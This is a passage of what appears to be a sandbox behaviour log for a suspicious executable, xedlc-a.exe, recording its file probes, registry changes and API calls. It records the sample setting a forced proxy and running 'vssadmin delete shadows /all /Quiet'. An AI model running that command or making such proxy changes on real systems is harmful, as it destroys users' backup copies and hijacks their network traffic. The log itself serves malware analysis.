44973.          processinfo:
44974.            tainted: true
44975.            pid: 1056
44976.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44977.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44978.            ads:
44979.          fid (ads:): 0
44980.          failure: open
44981.          ntstatus: 0xc0000034
44982.          CreateOptions: 0x200000
44983.          PE:
44984.            InspectionType: Ext
44985.        file:
44986.          timestamp: 61967
44987.          mode: failed
44988.          sequenceNumber: 604
44989.          value: C:\Documents and Settings\admin\Application Data\rtutils.dll
44990.          processinfo:
44991.            tainted: true
44992.            pid: 1056
44993.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44994.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44995.            ads:
44996.          fid (ads:): 0
44997.          failure: open
44998.          ntstatus: 0xc0000034
44999.          CreateOptions: 0x200000
45000.          PE:
45001.            InspectionType: Ext
45002.        apicall:
45003.          timestamp: 62017
45004.          repeat: 30
45005.          sequenceNumber: 605
45006.          processinfo:
45007.            pid: 1056
45008.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45009.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45010.          dllname: kernel32.dll
45011.          apiname: Sleep
45012.          address: 0x0042207d
45013.        apicall:
45014.          timestamp: 62022
45015.          sequenceNumber: 606
45016.          processinfo:
45017.            pid: 1056
45018.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45019.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45020.          dllname: kernel32.dll
45021.          apiname: GetComputerNameW
45022.          address: 0x76e96391
45023.          params:
45024.            param (id:1): 0x224fe50
45025.            param (id:2): 0x224fe48
45026.        regkey:
45027.          randomized: true
45028.          mode: queryvalue
45029.          sequenceNumber: 607
45030.          timestamp: 62073
45031.          value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
45032.           processinfo:
45033.             pid: 1056
45034.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45035.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45036.         apicall:
45037.           timestamp: 62301
45038.           sequenceNumber: 608
45039.           processinfo:
45040.             pid: 1056
45041.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45042.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45043.           dllname: kernel32.dll
45044.           apiname: GetSystemDirectoryW
45045.           address: 0x76ee27c6
45046.           params:
45047.             param (id:1): 0x1cdda04
45048.             param (id:2): 261
45049.         apicall:
45050.           timestamp: 62340
45051.           sequenceNumber: 609
45052.           processinfo:
45053.             pid: 1056
45054.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45055.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45056.           dllname: kernel32.dll
45057.           apiname: GetComputerNameW
45058.           address: 0x769c6a9e
45059.           params:
45060.             param (id:1): 0x181e60
45061.             param (id:2): 0x1cdd474
45062.         file:
45063.           timestamp: 62363
45064.           mode: failed
45065.           sequenceNumber: 610
45066.           value: C:\Documents and Settings\admin\Application Data\msapsspc.dll
45067.           processinfo:
45068.             tainted: true
45069.             pid: 1056
45070.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45071.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45072.             ads:
45073.           fid (ads:): 0
45074.           failure: open
45075.           ntstatus: 0xc0000034
45076.           CreateOptions: 0x200000
45077.           PE:
45078.             InspectionType: Ext
45079.         file:
45080.           timestamp: 62369
45081.           mode: failed
45082.           sequenceNumber: 611
45083.           value: C:\DOCUME~1\admin\LOCALS~1\Temp\msapsspc.dll
45084.           processinfo:
45085.             tainted: true
45086.             pid: 1056
45087.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45088.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45089.             ads:
45090.           fid (ads:): 0
45091.           failure: open
45092.           ntstatus: 0xc0000034
45093.           CreateOptions: 0x200000
45094.           PE:
45095.             InspectionType: Ext
45096.         file:
45097.           timestamp: 62374
45098.           mode: failed
45099.           sequenceNumber: 612
45100.           value: C:\Documents and Settings\admin\Application Data\schannel.dll
45101.           processinfo:
45102.             tainted: true
45103.             pid: 1056
45104.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45105.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45106.             ads:
45107.           fid (ads:): 0
45108.           failure: open
45109.           ntstatus: 0xc0000034
45110.           CreateOptions: 0x200000
45111.           PE:
45112.             InspectionType: Ext
45113.         regkey:
45114.           timestamp: 62378
45115.           mode: added
45116.           sequenceNumber: 613
45117.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
45118.           processinfo:
45119.             pid: 1056
45120.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45121.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45122.         file:
45123.           timestamp: 62383
45124.           mode: failed
45125.           sequenceNumber: 614
45126.           value: C:\DOCUME~1\admin\LOCALS~1\Temp\schannel.dll
45127.           processinfo:
45128.             tainted: true
45129.             pid: 1056
45130.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45131.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45132.             ads:
45133.           fid (ads:): 0
45134.           failure: open
45135.           ntstatus: 0xc0000034
45136.           CreateOptions: 0x200000
45137.           PE:
45138.             InspectionType: Ext
45139.         file:
45140.           timestamp: 62388
45141.           mode: failed
45142.           sequenceNumber: 615
45143.           value: C:\Documents and Settings\admin\Application Data\digest.dll
45144.           processinfo:
45145.             tainted: true
45146.             pid: 1056
45147.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45148.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45149.             ads:
45150.           fid (ads:): 0
45151.           failure: open
45152.           ntstatus: 0xc0000034
45153.           CreateOptions: 0x200000
45154.           PE:
45155.             InspectionType: Ext
45156.         regkey:
45157.           randomized: true
45158.           mode: queryvalue
45159.           sequenceNumber: 616
45160.           timestamp: 62392
45161.           value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
45162.          processinfo:
45163.            pid: 1056
45164.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45165.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45166.        regkey:
45167.          timestamp: 62396
45168.          mode: added
45169.          sequenceNumber: 617
45170.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
45171.          processinfo:
45172.            pid: 1056
45173.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45174.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45175.        file:
45176.          timestamp: 62401
45177.          mode: failed
45178.          sequenceNumber: 618
45179.          value: C:\DOCUME~1\admin\LOCALS~1\Temp\digest.dll
45180.          processinfo:
45181.            tainted: true
45182.            pid: 1056
45183.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45184.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45185.            ads:
45186.          fid (ads:): 0
45187.          failure: open
45188.          ntstatus: 0xc0000034
45189.          CreateOptions: 0x200000
45190.          PE:
45191.            InspectionType: Ext
45192.        file:
45193.          timestamp: 62408
45194.          mode: failed
45195.          sequenceNumber: 619
45196.          value: C:\Documents and Settings\admin\Application Data\msnsspc.dll
45197.          processinfo:
45198.            tainted: true
45199.            pid: 1056
45200.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45201.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45202.            ads:
45203.          fid (ads:): 0
45204.          failure: open
45205.          ntstatus: 0xc0000034
45206.          CreateOptions: 0x200000
45207.          PE:
45208.            InspectionType: Ext
45209.        file:
45210.          timestamp: 62412
45211.          mode: failed
45212.          sequenceNumber: 620
45213.          value: C:\DOCUME~1\admin\LOCALS~1\Temp\msnsspc.dll
45214.          processinfo:
45215.            tainted: true
45216.            pid: 1056
45217.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45218.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45219.            ads:
45220.          fid (ads:): 0
45221.          failure: open
45222.          ntstatus: 0xc0000034
45223.          CreateOptions: 0x200000
45224.          PE:
45225.            InspectionType: Ext
45226.        file:
45227.          timestamp: 62488
45228.          mode: failed
45229.          sequenceNumber: 621
45230.          value: C:\Documents and Settings\admin\Application Data\iphlpapi.dll
45231.          processinfo:
45232.            tainted: true
45233.            pid: 1056
45234.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45235.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45236.            ads:
45237.          fid (ads:): 0
45238.          failure: open
45239.          ntstatus: 0xc0000034
45240.          CreateOptions: 0x200000
45241.          PE:
45242.            InspectionType: Ext
45243.        regkey:
45244.          timestamp: 62492
45245.          mode: added
45246.          sequenceNumber: 622
45247.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
45248.          processinfo:
45249.            pid: 1056
45250.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45251.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45252.        regkey:
45253.          timestamp: 62496
45254.          mode: setval
45255.          sequenceNumber: 623
45256.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"AppData" = C:\Documents and Settings\admin\Application Data
45257.           processinfo:
45258.             pid: 1056
45259.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45260.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45261.         file:
45262.           timestamp: 62502
45263.           mode: failed
45264.           sequenceNumber: 624
45265.           value: C:\Documents and Settings\admin\Application Data\Microsoft\NETWORK\CONNECTIONS\PBK
45266.           processinfo:
45267.             pid: 1056
45268.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45269.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45270.             ads:
45271.           fid (ads:): 0
45272.           failure: open
45273.           ntstatus: 0xc000003a
45274.           CreateOptions: 0x21
45275.         file:
45276.           timestamp: 62524
45277.           mode: failed
45278.           sequenceNumber: 625
45279.           value: C:\Documents and Settings\admin\Application Data\sensapi.dll
45280.           processinfo:
45281.             tainted: true
45282.             pid: 1056
45283.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45284.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45285.             ads:
45286.           fid (ads:): 0
45287.           failure: open
45288.           ntstatus: 0xc0000034
45289.           CreateOptions: 0x200000
45290.           PE:
45291.             InspectionType: Ext
45292.         regkey:
45293.           timestamp: 62767
45294.           mode: added
45295.           sequenceNumber: 626
45296.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
45297.           processinfo:
45298.             pid: 1056
45299.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45300.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45301.         regkey:
45302.           timestamp: 62772
45303.           mode: added
45304.           sequenceNumber: 627
45305.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
45306.           processinfo:
45307.             pid: 1056
45308.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45309.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45310.         regkey:
45311.           timestamp: 62776
45312.           mode: added
45313.           sequenceNumber: 628
45314.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings
45315.           processinfo:
45316.             pid: 1056
45317.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45318.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45319.         regkey:
45320.           timestamp: 62781
45321.           mode: setval
45322.           sequenceNumber: 629
45323.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"ProxyEnable" = 0x00000000
45324.          processinfo:
45325.            pid: 1056
45326.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45327.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45328.        regkey:
45329.          timestamp: 62781
45330.          mode: setval
45331.          sequenceNumber: 630
45332.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"ProxyServer" = 10.0.0.2:8080
45333.           processinfo:
45334.             pid: 1056
45335.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45336.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45337.         regkey:
45338.           timestamp: 62781
45339.           mode: deleteval
45340.           sequenceNumber: 631
45341.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"ProxyOverride"
45342.          processinfo:
45343.            pid: 1056
45344.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45345.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45346.        regkey:
45347.          timestamp: 62831
45348.          mode: deleteval
45349.          sequenceNumber: 632
45350.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"AutoConfigURL"
45351.           processinfo:
45352.             pid: 1056
45353.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45354.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45355.         regkey:
45356.           timestamp: 62835
45357.           mode: added
45358.           sequenceNumber: 633
45359.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
45360.           processinfo:
45361.             pid: 1056
45362.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45363.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45364.         regkey:
45365.           timestamp: 62840
45366.           mode: added
45367.           sequenceNumber: 634
45368.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
45369.           processinfo:
45370.             pid: 1056
45371.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45372.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45373.         regkey:
45374.           timestamp: 62843
45375.           mode: setval
45376.           sequenceNumber: 635
45377.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\"SavedLegacySettings" = 46 00 00 00 1d 00 00 00 01 00 00 00 0d 00 00 00 31 30 2e 30 2e 30 2e 32 3a 38 30 38 30 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 c0 7e dd d3 73 dc cc 01 01 00 00 00 0a 00 02 0f 00 00 00 00 00 00 00 00 00 00 00 00
45378.          processinfo:
45379.            pid: 1056
45380.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45381.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45382.        process:
45383.          timestamp: 62853
45384.          mode: started
45385.          sequenceNumber: 636
45386.          value: C:\WINDOWS\system32\vssadmin.exe
45387.          pid: 1412
45388.          ppid: 1056
45389.          parentname: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45390.          cmdline: "C:\WINDOWS\system32\vssadmin.exe" delete shadows /all   /Quiet
45391.          filesize: 33792
45392.          md5sum: cdf76989d9fe20b7cc79c9c3f7ba2d4c
45393.          sha1sum: 3eb0e4bf445a5adc70394a4ba6fd5631c64396ca
45394.            ads:
45395.          fid (ads:): 281474976713206
45396.        apicall:
45397.          timestamp: 62959
45398.          sequenceNumber: 637
45399.          processinfo:
45400.            pid: 1056
45401.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45402.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45403.          dllname: kernel32.dll
45404.          apiname: GetSystemDirectoryW
45405.          address: 0x755dd323
45406.          params:
45407.            param (id:1): 0xeffc7c
45408.            param (id:2): 261
45409.        apicall:
45410.          timestamp: 62960
45411.          sequenceNumber: 638
45412.          processinfo:
45413.            pid: 1056
45414.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45415.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45416.          dllname: kernel32.dll
45417.          apiname: GetSystemDirectoryW
45418.          address: 0x755dd323
45419.          params:
45420.            param (id:1): 0xeffc7c
45421.            param (id:2): 261
45422.        regkey:
45423.          timestamp: 62973
45424.          mode: added
45425.          sequenceNumber: 639
45426.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network\Location Awareness
45427.          processinfo:
45428.            pid: 1056
45429.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45430.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45431.        file:
45432.          timestamp: 62981
45433.          mode: failed
45434.          sequenceNumber: 640
45435.          value: C:\Documents and Settings\admin\Application Data\rasadhlp.dll
45436.          processinfo:
45437.            tainted: true
45438.            pid: 1056
45439.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45440.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45441.            ads:
45442.          fid (ads:): 0
45443.          failure: open
45444.          ntstatus: 0xc0000034
45445.          CreateOptions: 0x200000
45446.          PE:
45447.            InspectionType: Ext
45448.        process:
45449.          timestamp: 63043
45450.          mode: opened
45451.          sequenceNumber: 641
45452.          desiredaccess: 0x02000030
45453.          ntstatus: 0x00000000
45454.          target:
45455.            processinfo:
45456.              pid: 1412
45457.              imagepath: C:\WINDOWS\system32\vssadmin.exe
45458.              md5sum: cdf76989d9fe20b7cc79c9c3f7ba2d4c
45459.          source:
45460.            processinfo:
45461.              pid: 1056
45462.              imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45463.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45464.        regkey:
45465.          timestamp: 63082
45466.          mode: added
45467.          sequenceNumber: 642
45468.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
45469.          processinfo:
45470.            pid: 1056
45471.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45472.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45473.        regkey:
45474.          timestamp: 63086
45475.          mode: added
45476.          sequenceNumber: 643
45477.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings
45478.          processinfo:
45479.            pid: 1056
45480.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45481.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45482.        regkey:
45483.          timestamp: 63089
45484.          mode: setval
45485.          sequenceNumber: 644
45486.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"ProxyEnable" = 0x00000000
45487.           processinfo:
45488.             pid: 1056
45489.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45490.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45491.         regkey:
45492.           timestamp: 63094
45493.           mode: setval
45494.           sequenceNumber: 645
45495.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"ProxyServer" = 10.0.0.2:8080
45496.          processinfo:
45497.            pid: 1056
45498.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45499.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45500.        regkey:
45501.          timestamp: 63099
45502.          mode: deleteval
45503.          sequenceNumber: 646
45504.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"ProxyOverride"
45505.           processinfo:
45506.             pid: 1056
45507.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45508.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45509.         regkey:
45510.           timestamp: 63103
45511.           mode: deleteval
45512.           sequenceNumber: 647
45513.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"AutoConfigURL"
45514.          processinfo:
45515.            pid: 1056
45516.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45517.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45518.        regkey:
45519.          timestamp: 63108
45520.          mode: added
45521.          sequenceNumber: 648
45522.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
45523.          processinfo:
45524.            pid: 1056
45525.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45526.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45527.        regkey:
45528.          timestamp: 63113
45529.          mode: added
45530.          sequenceNumber: 649
45531.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
45532.          processinfo:
45533.            pid: 1056
45534.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45535.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45536.        regkey:
45537.          timestamp: 63117
45538.          mode: setval
45539.          sequenceNumber: 650
45540.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\"SavedLegacySettings" = 46 00 00 00 1e 00 00 00 01 00 00 00 0d 00 00 00 31 30 2e 30 2e 30 2e 32 3a 38 30 38 30 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 c0 7e dd d3 73 dc cc 01 01 00 00 00 0a 00 02 0f 00 00 00 00 00 00 00 00 00 00 00 00
45541.           processinfo:
45542.             pid: 1056
45543.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45544.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45545.         apicall:
45546.           timestamp: 63137
45547.           sequenceNumber: 651
45548.           processinfo:
45549.             pid: 1056
45550.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45551.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45552.           dllname: kernel32.dll
45553.           apiname: GetSystemTime
45554.           address: 0x63004857
45555.           params:
45556.             param (id:1): 0x1cddabc
45557.         apicall:
45558.           timestamp: 63141
45559.           sequenceNumber: 652
45560.           processinfo:
45561.             pid: 1056
45562.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45563.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45564.           dllname: kernel32.dll
45565.           apiname: SystemTimeToFileTime
45566.           address: 0x63004862
45567.           params:
45568.             param (id:1): 0x1cddabc
45569.             param (id:2): 0x1cddaf0
45570.         apicall:
45571.           timestamp: 63194
45572.           sequenceNumber: 653
45573.           processinfo:
45574.             pid: 1056
45575.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45576.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45577.           dllname: kernel32.dll
45578.           apiname: GetSystemTime
45579.           address: 0x63004857
45580.           params:
45581.             param (id:1): 0x1cdd984
45582.         apicall:
45583.           timestamp: 63198
45584.           sequenceNumber: 654
45585.           processinfo:
45586.             pid: 1056
45587.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45588.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45589.           dllname: kernel32.dll
45590.           apiname: SystemTimeToFileTime
45591.           address: 0x63004862
45592.           params:
45593.             param (id:1): 0x1cdd984
45594.             param (id:2): 0x1cdd9ac
45595.         file:
45596.           timestamp: 63205
45597.           mode: failed
45598.           sequenceNumber: 655
45599.           value: C:\Documents and Settings\admin\Application Data\DNSAPI.dll
45600.           processinfo:
45601.             tainted: true
45602.             pid: 1056
45603.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45604.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45605.             ads:
45606.           fid (ads:): 0
45607.           failure: open
45608.           ntstatus: 0xc0000034
45609.           CreateOptions: 0x200000
45610.           PE:
45611.             InspectionType: Ext
45612.         regkey:
45613.           timestamp: 63209
45614.           mode: added
45615.           sequenceNumber: 656
45616.           value: \REGISTRY\MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
45617.           processinfo:
45618.             pid: 1056
45619.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45620.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45621.         regkey:
45622.           timestamp: 63212
45623.           mode: added
45624.           sequenceNumber: 657
45625.           value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters
45626.           processinfo:
45627.             pid: 1056
45628.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45629.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45630.         regkey:
45631.           timestamp: 63262
45632.           mode: added
45633.           sequenceNumber: 658
45634.           value: \REGISTRY\MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
45635.           processinfo:
45636.             pid: 1056
45637.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45638.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45639.         regkey:
45640.           timestamp: 63265
45641.           mode: added
45642.           sequenceNumber: 659
45643.           value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters
45644.           processinfo:
45645.             pid: 1056
45646.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45647.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45648.         process:
45649.           timestamp: 63271
45650.           mode: opened
45651.           sequenceNumber: 660
45652.           desiredaccess: 0x02000030
45653.           ntstatus: 0x00000000
45654.           target:
45655.             processinfo:
45656.               pid: 1412
45657.               imagepath: C:\WINDOWS\system32\vssadmin.exe
45658.               md5sum: cdf76989d9fe20b7cc79c9c3f7ba2d4c
45659.           source:
45660.             processinfo:
45661.               pid: 1056
45662.               imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45663.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45664.         regkey:
45665.           timestamp: 63276
45666.           mode: added
45667.           sequenceNumber: 661
45668.           value: \REGISTRY\MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
45669.           processinfo:
45670.             pid: 1056
45671.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45672.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45673.         regkey:
45674.           timestamp: 63280
45675.           mode: added
45676.           sequenceNumber: 662
45677.           value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters
45678.           processinfo:
45679.             pid: 1056
45680.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45681.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45682.         regkey:
45683.           timestamp: 63285
45684.           mode: added
45685.           sequenceNumber: 663
45686.           value: \REGISTRY\MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
45687.           processinfo:
45688.             pid: 1056
45689.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45690.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45691.         regkey:
45692.           timestamp: 63286
45693.           mode: added
45694.           sequenceNumber: 664
45695.           value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters
45696.           processinfo:
45697.             pid: 1056
45698.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45699.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45700.         apicall:
45701.           timestamp: 63286
45702.           sequenceNumber: 665
45703.           processinfo:
45704.             pid: 1056
45705.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
45706.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
45707.           dllname: kernel32.dll
45708.           apiname: GetSystemDirectoryA
45709.           address: 0x76f28a9e
45710.           params:
45711.             param (id:1): 0x1cdbb7c
45712.             param (id:2): 260
45713.         mutex:
45714.           timestamp: 63337
45715.           sequenceNumber: 666
45716.           value: \BaseNamedObjects\SHIMLIB_LOG_MUTEX
45717.           processinfo:
45718.             pid: 1412
45719.             imagepath: C:\WINDOWS\system32\vssadmin.exe
45720.             md5sum: cdf76989d9fe20b7cc79c9c3f7ba2d4c
45721.         file:
45722.           timestamp: 63342
45723.           mode: failed
45724.           sequenceNumber: 667
45725.           value: C:\Documents and Settings\admin\Application Data\hnetcfg.dll
45726.           processinfo:
45727.             tainted: true
45728.             pid: 1056
